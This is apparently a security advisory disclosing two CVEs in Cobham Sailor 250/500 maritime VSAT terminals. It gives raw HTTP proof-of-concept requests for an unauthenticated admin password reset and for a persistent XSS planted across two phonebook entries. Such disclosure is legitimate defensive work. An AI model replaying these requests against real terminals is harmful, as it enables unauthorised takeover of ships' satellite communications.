Cobham Satcom Sailor 250 / 500 VSAT Vulnerabilities
The CyberSKR Maritime Security Team recently identified multiple vulenerabilities in Cobham Satcom products, specifically the Sailor 250 / 500 VSAT systems (version <1.25).
The vendor’s response was excellent, and we were put in contact with a senior member of the company almost immediately, who was able to action the information we provided them with in a very timely manner.
Vulnerability Overview – Cobham Satcom Sailor 250 / 500- Authentication Bypass via Un-Authenticated Password Reset
- Persistent Cross Site Scripting (XSS)
CVE-2018-19392: Sailor 250 / 500 Authentication Bypass via Unauthenticated Password Reset
It was possible for an unauthenticated user to reset a user's (including the default "admin" account's) password. This did not require prior knowledge of the user account's current password to be successful.
Example Unauthenticated Password Reset (Sailor 250/500)
Update --REDACTED-- with your target host/IPPOST /index.lua?pageID=Administration&langID=english HTTP/1.1 Host: --REDACTED-- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://--REDACTED--/index.lua?pageID=Administration&langID=english Content-Type: application/x-www-form-urlencoded Content-Length: 79 Cookie: DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 usernameAdmChange=admin&passwordAdmChange1=CyberSKR&passwordAdmChange2=CyberSKR
CVE-2018-19391: Sailor 250 / 500 Persistent XSS
A vulnerability was identified in the Cobham Satcom Sailor 250 / 500 systems where an unauthenticated threat actor could embed executable JavaScript code into the web application.
Example Persistent XSS (Request 1)
Update --REDACTED-- where necessaryPOST /index.lua?pageID=Phone%20book&langID=english&phonebookOP=saveEntry&entryIndex=2&phonebookPage=1 HTTP/1.1 Host: --REDACTED-- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://--REDACTED--/index.lua?pageID=Phone%20book&langID=english&phonebookOP=edit&entryIndex=2&phonebookPage=1 Content-Type: application/x-www-form-urlencoded Content-Length: 36 Cookie: tt_adm=--REDACTED-- DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 name=<script>/*&number=1111111111
Example Persistent XSS (Request 2)
Update --REDACTED-- where necessaryPOST /index.lua?pageID=Phone%20book&langID=english&phonebookOP=saveEntry&entryIndex=3&phonebookPage=1 HTTP/1.1 Host: --REDACTED-- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://--REDACTED--/index.lua?pageID=Phone%20book&langID=english&phonebookOP=edit&entryIndex=2&phonebookPage=1 Content-Type: application/x-www-form-urlencoded Content-Length: 46 Cookie: tt_adm=--REDACTED-- DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 name=*/alert(1);</script>&number=1111111111